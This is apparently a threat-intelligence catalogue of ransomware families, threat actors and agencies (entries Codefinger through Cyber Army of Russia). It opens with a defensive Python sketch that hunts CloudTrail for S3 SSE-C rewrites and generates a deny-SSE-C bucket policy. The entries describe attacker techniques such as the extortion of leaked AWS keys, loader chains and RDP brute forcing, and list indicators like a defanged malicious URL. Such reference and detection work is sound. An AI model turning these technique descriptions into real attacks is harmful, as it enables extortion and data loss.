Codefinger is a ransomware group that targets Amazon S3 buckets by exploiting AWS’s Server-Side Encryption with Customer Provided Keys to encrypt victim data. They utilize compromised AWS credentials to gain access and demand Bitcoin ransoms for the decryption keys, threatening to delete files if negotiations fail. The group has been observed abusing publicly disclosed AWS keys with permissions to read and write S3 objects, making recovery impossible without their cooperation. Halcyon has documented multiple incidents linked to Codefinger's data extortion campaign against organizations with unsecured infrastructure.
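The Codefinger technique needs no malware: a leaked key with s3:PutObject is enough to rewrite every object under a customer-provided key, and S3 never stores that key. The following is an added example (not the page's or Halcyon's code) showing both sides of the response: hunting CloudTrail S3 data events for SSE-C writes grouped by principal, and a bucket policy that denies customer-provided keys outright. The records are constructed; the field names used (eventName, additionalEventData.SSEApplied, userIdentity.arn, requestParameters.bucketName) follow the documented S3 data-event schema but should be checked against your own logs, and the threshold is an assumption.

```python
"""Hunting and hardening sketch for the Codefinger technique above: objects
re-encrypted with S3 SSE-C keys the attacker controls. Added example, not the
page's or Halcyon's code. The CloudTrail records are constructed; field names
follow the documented S3 data-event schema but should be verified locally."""
import json
from collections import defaultdict

SSE_C_VALUE = "SSE_C"
WRITE_EVENTS = {"PutObject", "CopyObject", "CreateMultipartUpload", "UploadPartCopy"}
SSE_C_CONDITION_KEY = "s3:x-amz-server-side-encryption-customer-algorithm"


def sse_c_writes(records):
    """Return the CloudTrail records that wrote an object under SSE-C."""
    return [r for r in records
            if r.get("eventSource") == "s3.amazonaws.com"
            and r.get("eventName") in WRITE_EVENTS
            and r.get("additionalEventData", {}).get("SSEApplied") == SSE_C_VALUE]


def suspicious_principals(records, min_objects=3):
    """Principals that wrote at least min_objects SSE-C objects, with the buckets
    touched. Codefinger's in-place CopyObject rewrite produces exactly this shape."""
    per_principal = defaultdict(lambda: {"count": 0, "buckets": set()})
    for r in sse_c_writes(records):
        arn = r.get("userIdentity", {}).get("arn", "unknown")
        per_principal[arn]["count"] += 1
        per_principal[arn]["buckets"].add(r.get("requestParameters", {}).get("bucketName", "?"))
    return {arn: {"count": v["count"], "buckets": sorted(v["buckets"])}
            for arn, v in per_principal.items() if v["count"] >= min_objects}


def deny_sse_c_policy(bucket: str) -> dict:
    """Bucket policy denying any object write that supplies a customer key.
    A Null condition of "false" means 'the header is present'."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyCustomerProvidedKeys",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
            "Condition": {"Null": {SSE_C_CONDITION_KEY: "false"}},
        }],
    }


def policy_blocks_sse_c(policy: dict) -> bool:
    """True if the policy carries a Deny on s3:PutObject conditioned on SSE-C."""
    for st in policy.get("Statement", []):
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        cond = st.get("Condition", {}).get("Null", {})
        if (st.get("Effect") == "Deny" and "s3:PutObject" in actions
                and cond.get(SSE_C_CONDITION_KEY) == "false"):
            return True
    return False


def sample_records():
    """Constructed CloudTrail-style records: one leaked user key rewriting three
    objects with SSE-C, one normal SSE-KMS upload by a service role."""
    def rec(name, arn, key, sse):
        return {"eventSource": "s3.amazonaws.com", "eventName": name,
                "userIdentity": {"arn": arn},
                "requestParameters": {"bucketName": "finance-archive", "key": key},
                "additionalEventData": {"SSEApplied": sse}}
    leaked = "arn:aws:iam::111122223333:user/ci-deploy"
    role = "arn:aws:sts::111122223333:assumed-role/etl-role/session"
    return ([rec("CopyObject", leaked, f"q1/ledger-{i}.csv", "SSE_C") for i in range(3)]
            + [rec("PutObject", role, "q2/summary.parquet", "SSE_KMS")])


if __name__ == "__main__":
    print(json.dumps(suspicious_principals(sample_records()), indent=2))
    print(json.dumps(deny_sse_c_policy("finance-archive"), indent=2))
```

The hunt only works if S3 data events are actually being delivered to CloudTrail for the buckets in question (they are off by default), and the policy only helps before the rewrite; enabling versioning with object lock is what preserves the pre-attack copies after it.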

Codemanager

Ransomware

CoderCrypt

Ransomware

Coin Locker

Ransomware

Coinbase Cartel

Coinbase Cartel is a ransomware threat actor that emerged in September 2025, focusing on data exfiltration rather than encryption, and has claimed over 60 victims, primarily in the healthcare, technology, and transportation sectors. The group employs TTPs such as social engineering, credential harvesting, and collaboration with Initial Access Brokers to gain initial access. They operate a data leak site where they publish victim names and issue ransom demands, requiring payment via Bitcoin.

CoinVault

Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!

Cold River

In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.

colossus

Colossus ransomware was first observed in September 2021, when ZeroFox researchers uncovered the variant attacking a U.S.-based automotive group. It employs a double-extortion model, using Themida packing and sandbox evasion to disable defenses and deliver encrypted payloads. Victims are urged to visit a support site—hosted at a domain like colossus.support—to negotiate payment, or face large-scale data dumps and increasing ransom amounts tied to countdown timers. Operators demonstrated familiarity with RaaS playbooks, drawing architectural parallels to groups like EpsilonRed, BlackCocaine, and REvil/Sodinokibi.

ComicForm

ComicForm is an emerging cyber threat actor tracked since at least April 2025, specializing in targeted phishing campaigns against organizations in Eurasian countries including Belarus, Kazakhstan, and Russia, often in sectors like banking, production, and critical infrastructure. The group deploys FormBook infostealer malware via sophisticated loaders: an obfuscated .NET executable unpacks MechMatrix Pro.dll, which decrypts and executes Montero.dll dropper in memory to deliver FormBook, establishing persistence through scheduled tasks and antivirus exclusions while evading detection. Malware binaries uniquely embed Tumblr links to innocuous comic superhero GIFs (e.g., Batman), from which the actor derives its name, alongside phishing lures themed around recruitment, quotes, or production facilities using Russian free email services like Rivet_kz. Active through at least September 2025 with no confirmed overlaps to other actors like pro-Russian SectorJ149 despite concurrent Eurasian operations, ComicForm demonstrates proficiency in commodity malware customization and regional targeting.

Common Raven

Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.

CommonRansom

A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim's files.

Communications Security Establishment Canada

Communications Security Establishment (CSE)

Comrade Circle Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Comrade HT

Ransomware

CoNFicker

Ransomware

Confucious

Confucius is an APT organization funded by India. It has been carrying out cyber attacks since 2013. Its main targets are India's neighbouring countries such as Pakistan and China. It has a strong interest in targets in the fields of military, government and energy.

Conquerors Electronic Army

Conquerors Electronic Army operates under the “Wa’d al-Akhira” banner and has claimed multiple attacks against Israeli targets, including civil emergency alerting and healthcare sectors, utilizing rented stresser infrastructure and CheckHost proof-of-disruption links. The group has embedded links to a UK-registered charity in their operations, suggesting a potential disruption attempt rather than solely an information operation. Security company Radware identified Conquerors Electronic Army as one of the primary actors behind a series of DDoS attacks targeting government entities in the Middle East. Their activities indicate a focus on both disruptive and influence operations.

Consciousness

ransomware

ConsoleApplication1 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

contfr

Launched around September 2024, ContFR is a French-speaking RaaS that uses a Tor-hosted platform to provide ransomware embedded in PDF files (targeting both Windows and macOS). The group offers a tiered subscription model—“TEST,” “BASIC,” and “ELITE”—allowing affiliates varying degrees of customization, offline capability, and support based on the package purchased. As of the latest reporting, no victims are publicly listed, though data leak publications likely require a subscription to access. The operation suggests an organized, business‑like structure, distinct from opportunistic one‑off strains.

Conti

Conti is a Russian ransomware-as-a-service operation known for targeting healthcare and critical infrastructure.

Coom

Ransomware

Cooming

previous clearnet domain coomingproject.com

Copy-Paste

The title ‘Copy-paste compromises’, given by the Australian Government, is derived from the actor’s heavy use of tools copied almost identically from open source.

CoralRaider

CoralRaider is a financially motivated threat actor of Vietnamese origin, targeting victims in Asian and Southeast Asian countries since at least 2023. They use the RotBot loader family and XClient stealer to steal victim information, with hardcoded Vietnamese words in their payloads. CoralRaider operates from Hanoi, Vietnam, and uses a Telegram bot as a C2 channel for their malicious campaigns. Their activities include system reconnaissance, data exfiltration, and targeting victims in multiple countries in the region.

core

Core ransomware surfaced in early 2025 as a new variant within the broader Makop family. It employs a single-extortion model, focusing on encrypting files and demanding payment, without public data-leak threats. The malware appends the .core extension to encrypted files and is delivered via typical exploit vectors known to RaaS campaigns. Core does not showcase advanced double-extortion tactics seen in other modern strains, but it stands out for its familial lineage and continued evolution from Makop ancestors.

CoronaVirus

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

CorruptCrypt

Ransomware

Corsair Jackal

Corsair Jackal is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Cosmic Lynx

Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.

CosmicBeetle

CosmicBeetle is a threat actor known for deploying the ScRansom ransomware, which has replaced its previous variant, Scarab. The actor utilizes a custom toolset called Spacecolon, consisting of ScHackTool, ScInstaller, and ScService, to gain initial access through RDP brute forcing and exploiting vulnerabilities like CVE-2020-1472 and FortiOS SSL-VPN. CosmicBeetle has been observed impersonating the LockBit ransomware gang to leverage its reputation and has shown a tendency to leave artifacts on compromised systems. The group primarily targets SMBs globally, employing techniques such as credential dumping and data destruction.

CostaRicto

CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.

Cotton Sandstorm

Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury.

CoughingDown

CoughingDown is a threat group attributed to various cyber campaigns, including the deployment of the EAGERBEE backdoor, which utilizes service manipulation and privilege escalation techniques. The group has been linked to malware infrastructure that abuses legitimate services like MSDTC, IKEEXT, and SessionEnv to load malicious DLLs, including oci.dll. Analysis of supply-chain attacks, particularly involving Trojanized packages, has revealed similarities between CoughingDown malware and post-compromise tools used in these incidents. Evidence such as consistent service creation and C2 domain overlap further supports the connection between EAGERBEE and CoughingDown.

Council for Intelligence Coordination

Council for Intelligence Coordination

Council of Political and Security Affairs (Saudi Arabia)

Council of Political and Security Affairs (CPSA) – مجلس الشؤون السياسية والأمنية

Counter Terrorism and Intelligence Bureau

Counter Terrorism and Intelligence Bureau (CTIB)

Counter Terrorism and Transnational Crime

Counter Terrorism and Transnational Crime (CTTC)

Counter Terrorism Department (Pakistan)

Counter Terrorism Department (CTD)

Counter Terrorism Group

Counter Terrorism Group (CTG)

Coverton

Ransomware

CovidLock

Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware neither encrypts nor steals anything; it only locks the device with a hard-coded code.

Cr1ptT0r

Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.

Craftul

ransomware

Crazyhunter Team

Crazyhunter Team is an active extortion or ransomware group tracked by RansomLook.

CreamPie Ransomware

Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.

Creeper

Ransomware

Creepy

Ransomware

Crescent Typhoon

Microsoft threat actor profile. Origin/Threat: China.

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

Crime Intelligence (SAPS)

Crime Intelligence Division, South African Police Service

Criminal Intelligence Service Canada

Criminal Intelligence Service Canada (CISC)

Criminal Investigation Department (Bangladesh)

Criminal Investigation Department (CID)

Criminal Investigation Department (Kenya)

Directorate of Criminal Investigation(DCI)

Criminal Investigation Department (Sri Lanka)

Criminal Investigation Department (Sri Lanka)

Criminal Investigations Department

Criminal Investigations Department (CID)

Crimson Collective

The Crimson Collective is a cybercrime group that claimed to have compromised Red Hat's private GitHub repositories in September 2025. The group asserted it had stolen 570GB of data from Red Hat's private GitHub repositories, including 28,000 projects and approximately 800 Customer Engagement Reports (CERs) containing sensitive network data. CERs often contain sensitive information including infrastructure details, configurations, and tokens that attackers could exploit to target customers' networks. The group shared proof of the breach on a Telegram channel, including a full file tree, CER list, and screenshots. The U.S.-based multinational software company confirmed the data breach but did not verify the Crimson Collective's claims. The group also claimed to have gained access to some of Red Hat's client infrastructure and stated they had warned the company but were ignored.

Cripton

Ransomware

Cripton7zp

Ransomware

crosslock

CrossLock ransomware was first observed in April 2023, targeting an IT services firm in Brazil using a double‑extortion approach—encrypting data and threatening to leak it publicly. Written in Go, it uses a hybrid encryption scheme combining ChaCha20 for file encryption with Curve25519 for key protection. Victims see their files renamed with the .crlk extension and ransom notes titled ---CrossLock_readme_To_Decrypt---.txt. The malware includes advanced techniques like Event Tracing for Windows (ETW) bypass and process mimicking (e.g., Cybereason processes) for stealth. It was publicly tracked until July 2023, after which activity (and its leak site) went offline.

Crptxxx Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. Uses @enigma0x3's UAC bypass.

Cry36

Ransomware

Cry9

Ransomware

Cryaki

Ransomware

Cryakl

ransomware

Crybola

Ransomware

CryBrazil

Mostly Hidden Tear with some code from Eda2, and seems compiled with an Italian Visual Studio. Maybe related to OpsVenezuela?

CryCipher

Ransomware

CryCryptor

ransomware

CryDroid

ransomware

CryFile

Ransomware

CryForMe

Ransomware

Crying

Ransomware

Crylock

CryLock is a ransomware variant that emerged around April 2020, evolving from the Cryakl (Fantomas) ransomware family. It follows a semi-affiliate model, offering customizable options for partners—such as variable encryption routines, network scanning for lateral movement, shadow copy deletion, and process termination—and flexible delivery methods. During encryption, CryLock renames files to include the developer email, a unique victim ID, and a randomized three-letter extension. Victims typically encounter a countdown timer in a pop-up ransom message that warns about escalating ransom costs and potential loss of decryption capabilities.

CryLocker

Ransomware. Identifies victim locations with the Google Maps API.

CryMore

Ransomware

crynox

Crynox (sometimes referred to as “Crynox Ransomware”) appears to be a generic file-locker threat that appends .crynox to encrypted files and drops a ransom note (read_it.txt) instructing victims to contact crynoxWARE@proton.me. It seems to use RSA-4096 and AES for encryption and may change desktop wallpaper, but there's no evidence of double-extortion or leak site operation. Distribution methods cited include phishing, pirated software, and malicious websites.

cry0

cry0 is an active extortion or ransomware group tracked by RansomLook.

Cryp70n1c

Ransomware

cryp70n1c0d3

cryp70n1c0d3 is an active extortion or ransomware group tracked by RansomLook.

CrypMIC

Ransomware. CryptXXX clone/spinoff.

Crypren

Ransomware

crypt ransomware

.crYpt
MD5: 54EFAC23D7B524D56BEDBCE887E11849

Babuk Variant

Crypt0 HT

Ransomware

Crypt0

Ransomware

Crypt0L0cker

Ransomware

Crypt0r

Ransomware

Crypt12

Ransomware

Crypt32

ransomware

Crypt38

Ransomware

Cryptbb

Cryptbb is an active extortion or ransomware group tracked by RansomLook.

CryptConsole 2.0 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptConsole

This ransomware does not actually encrypt your files, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, and infected install files.

Cryptedpay

CryptedPay is a standalone ransomware strain observed around early 2025 that encrypts files using AES-256 and appends the .CRYPTEDPAY extension. Victims receive a ransom note (README.txt), have their desktop wallpaper changed, and are instructed to pay approximately $280 in Monero (XMR). The ransomware imposes a 62-hour deadline, threatening permanent file loss if not paid.

Crypter

Ransomware. Does not actually encrypt the files, but simply renames them.

CryptFIle2

Ransomware

CryptFuck

Ransomware

CryptGh0st

Ransomware

CryptInfinite

Ransomware

Cryptnet

CryptNet is a newer Ransomware-as-a-Service (RaaS) operation first identified in April 2023. It follows a double-extortion model, performing data exfiltration before encrypting files. Written in .NET and obfuscated with .NET Reactor, CryptNet utilizes AES-256 (CBC) and RSA-2048 encryption. Its codebase shares strong similarities with Chaos and Yashma ransomware families.

Crypto-Blocker

Ransomware

Crypto_Lab

Ransomware

crypto24

aka Public Data Storage

CryptoApp

Ransomware

CryptoBit

Ransomware (sekretzbel0ngt0us.KEY). Do not confuse with CryptorBit.

CryptoBlock Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom amount is 0.3 bitcoins. The ransomware disguises itself as Adobe Systems, Incorporated. RaaS.

CryptoBoss

Ransomware

CryptoCat

Ransomware

CryptoChameleon

CryptoChameleon is a cybercriminal group known for targeting cryptocurrency exchanges and users to steal digital assets, employing tactics such as VIP spear phishing, SIM swapping, and email hacks. They have leveraged phishing kits, including a notable one associated with LastPass, and utilize infrastructure from bulletproof host NICENIC. The group primarily targets platforms like Coinbase and Ledger, and their attacks are characterized by rapid cash-out efforts following successful breaches. Their operational methods include manually guiding victims through phishing pages to evade detection by automated scanners.

CryptoClone

Ransomware

CryptoDark

Ransomware

CryptoDefense

Ransomware. No extension change.

CryptoDevil Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptoFinancial

Ransomware

CryptoFortress

Ransomware. Mimics TorrentLocker. Encrypts only 50% of each file, up to 5 MB.

CryptoGod 2017

Ransomware

CryptoGod 2018

Ransomware

CryptoGraphic Locker

Ransomware. Has a GUI. Subvariants: CoinVault, BitCryptor.

.CryptoHasYou.

Ransomware

CryptoHost

Ransomware. RARs the victim's files; has a GUI.

CryptoJacky Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptoJoker

Ransomware

CryptoKill Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The files get encrypted, but the decryption key is not available. NO POINT IN PAYING THE RANSOM, THE FILES WILL NOT BE RETURNED.

CryptoLite

Ransomware

CryptoLocker 1.0.0

Ransomware

CryptoLocker 5.1

Ransomware

CryptoLocker by NTK Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptoLocker

Ransomware. No longer relevant.

CryptoLocker3 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Creator is staffttt and the ransom is 0.5 bitcoins.

CryptolockerEmulator

Ransomware

CryptoLockerEU 2016

Ransomware

CryptoLuck Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptoManiac

Ransomware

CryptoMeister Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

CryptoMix-0000

Ransomware

CryptoMix-Arena

Ransomware

CryptoMix-Azer

Ransomware

CryptoMix-Backup

Ransomware

CryptoMix-CK

Ransomware

CryptoMix-Coban

Ransomware

CryptoMix-DLL

Ransomware

CryptoMix-Empty

Ransomware

CryptoMix-Error

Ransomware

CryptoMix-Exte

Ransomware

Cryptomix-FILE

Ransomware

CryptoMix-MOLE66

Ransomware

CryptoMix-Noob

Ransomware

CryptoMix-Ogonia

Ransomware

CryptoMix-Pirate

Ransomware

CryptoMix-Revenge

Ransomware

Cryptomix-SERVER

Ransomware

CryptoMix-Shark

Ransomware

CryptoMix-System

Ransomware

CryptoMix-Tastylock

Ransomware

CryptoMix-Test

Ransomware

CryptoMix-Wallet

Ransomware

Cryptomix-WORK

Ransomware

CryptoMix-x1881

Ransomware

CryptoMix-XZZX

Ransomware

CryptoMix-Zayka

Ransomware

CryptoMix

Ransomware

Crypton Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Crypton

Ransomware

CryptoNar

When the CryptoNar, or Crypto Nar, Ransomware encrypts a victim's files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extension appended to the file's name.

CryptoPatronum

Ransomware

CryptoPokemon

Ransomware

CryptoRansomeware

Ransomware

CryptorBit

Ransomware

Cryptorium (Fake Ransomware)

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.

CryptoRoger

Ransomware

CryptoShadow

Ransomware

CryptoShield 1.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. CryptoShield 1.0 is a ransomware from the CryptoMix family.

CryptoShield 2.0

Ransomware

CryptoShocker

Ransomware

CryptoSpider

Ransomware

CryptoSweetTooth Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Its fake name is Bitcoin and the maker’s name is Santiago. The encryptor requires .NET Framework 4.5.2 on the victim's computer in order to run.

CryptoTorLocker2015

Ransomware

CryptoTrooper

Ransomware

CryptoViki

Ransomware

CryptoWall 1

Ransomware. Infection by phishing.

CryptoWall 2

Ransomware

CryptoWall 3

Ransomware

CryptoWall 4

Ransomware

CryptoWire Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Cryptre

Ransomware

CrypTron

Ransomware

CryptXXX 2.0

Ransomware. Locks the screen. Ransom note names are an ID. Comes with Bedep.

CryptXXX 3.0

Ransomware. Comes with Bedep.

CryptXXX 3.1

Ransomware. StilerX credential stealing.

CryptXXX

Ransomware. Comes with Bedep.

Crypute Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

CryPy

Ransomware

Crysis XTBL

Ransomware

Crystal

Ransomware

CrystalCrypt

Ransomware

CRYSTALRAY

CRYSTALRAY is a threat actor known for leveraging open source tools like zmap and SSH-Snake to conduct widespread vulnerability scanning and exploitation. They target victims to collect and sell credentials, deploy cryptominers, and maintain persistence in compromised environments. CRYSTALRAY uses multiple backdoors to control access and spreads through victim networks using SSH-Snake. The actor also uses tools like Platypus for managing victims and extracting sensitive information from compromised systems.

CryTekk

Ransomware

cs-137

Cs‑137 is a newly observed ransomware strain that first appeared in January 2025. It employs the ChaCha20 cipher for encryption and appends obfuscated filenames with a random 10-character alphanumeric identifier while preserving the original file extension. In its current testing phase, it drops a ransom note with a randomized filename (e.g. ABCDEF-README.txt) and sets a randomly named image file as the desktop wallpaper. The note references a Tor-based extortion portal—though access is not yet active, indicating the operation’s early development stage. The strategy suggests single-extortion behavior, focused on disrupting access rather than data theft or leak threats.

CSGO Ransomware

Supposed joke ransomware; decrypts when an executable containing the string "csgo" is run.

CSP

Ransomware

CTB-Faker

Ransomware

CTB-Locker Original

Ransomware

CTB-Locker WEB

Ransomware. Websites only.

ctblocker

aka Critroni
CTB‑Locker emerged in mid‑2014, introducing a new era of ransomware by leveraging elliptic curve cryptography (ECC), Tor-based C&C communication, and Bitcoin payments—earning its name from “Curve-Tor-Bitcoin Locker.” It was packaged and sold as a ransomware kit for approximately $1,500–$3,000, allowing affiliates to deploy customized campaigns. The malware encrypts user data (including network and removable drives), changes desktop wallpapers, and appends file extensions like .CTBL, .CTB2, or randomized strings. Victims receive instructions for payment, typically within a limited timeframe, or risk permanent data loss. In 2015–2017, law enforcement and cybersecurity firms (including McAfee and Kaspersky) disrupted the network, arrested operators, and facilitated decryption tools.

CTF

Ransomware

Cuba Ransomware Actors

A Group object to represent actors that deploy Cuba Ransomware in victim environments.[[U.S. CISA Cuba Ransomware October 2022](/references/d6ed5172-a319-45b0-b1cb-d270a2a48fa3)]

Cuba

The Cuba Ransomware, also known as Colddraw Ransomware, was first identified in the threat landscape in 2019 and built a relatively small but selected list of victims. The group is also known as Fidel Ransomware, due to a characteristic marker placed at the beginning of all encrypted files. This file marker is used as an indicator for the ransomware and its decoder that the file has been encrypted. Despite its name and the Cuban nationalist style on its leak site, it is difficult to assert any connection or affiliation with the Republic of Cuba. The group has been linked to a Russian-language threat actor by Profero researchers due to some details of incorrect translation they discovered, as well as the discovery of a 404 page containing text in Russian on the threat actor's own leak site. According to BlackBerry, based on the analysis of the code strings used in the campaign analyzed in 2023, there were indications that the developer behind the Cuba ransomware speaks Russian. The ransomware operators use a double extortion approach, and according to the USA, as of August 2022 the Cuba ransomware group was believed to have compromised 101 entities, demanding $145 million in ransom payments and receiving up to $60 million. The group used a similar set of TTPs, with only a slight change each year, as they generally consist of LOLBins (executables that are part of the operating system and can be exploited to support an attack), exploits, off-the-shelf and custom malware, as well as intrusion tools like Cobalt Strike and Metasploit. In 2022, the group allegedly developed a relationship with operators of the Industrial Spy market, using their platform as a means of data leakage.

Cuboid Sandstorm

Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company's network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.

Curator

ransomware

Curious Gorge

Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.

Curly COMrades

Curly COMrades is a threat actor identified by Amazon Threat Intelligence and Bitdefender, believed to operate in support of Russian interests. They employ techniques such as Hyper-V abuse for EDR evasion and utilize proxy tools like Resocks, SSH, and Stunnel to gain access to internal networks. Their activities include repeated attempts to extract the NTDS database from domain controllers and establishing covert access through virtualization features on compromised Windows 10 machines.

Curumim

Ransomware

Cutekitty

ransomware

CuteRansomware

Ransomware. Based on my-Little-Ransomware.

Cutting Kitten

One of the threat actors responsible for the denial of service attacks against the U.S. in 2012–2013. Three individuals associated with the group—believed to have been working on behalf of Iran’s Islamic Revolutionary Guard Corps—were indicted by the Justice Department in 2016.

CVLocker

Ransomware

Cyber Alliance

The Ukrainian Cyber Alliance is a pro-Ukraine hacktivist group formed in 2016, primarily targeting Russian entities since the invasion of Ukraine in 2022. They have claimed responsibility for significant cyberattacks, including the destruction of infrastructure at Russian internet provider Nodex and a breach of the microfinance company CarMoney, linked to Vladimir Putin's ex-wife. Their operations involve data destruction and disruption of IT infrastructure, utilizing techniques such as malware attacks and social engineering tactics. The group has positioned itself as a pro-military force, leveraging social media to communicate its activities and objectives.

Cyber.Anarchy.Squad

Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.

Cyber Army of Russia Reborn

Cyber Army of Russia Reborn is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Cyber Army of Russia

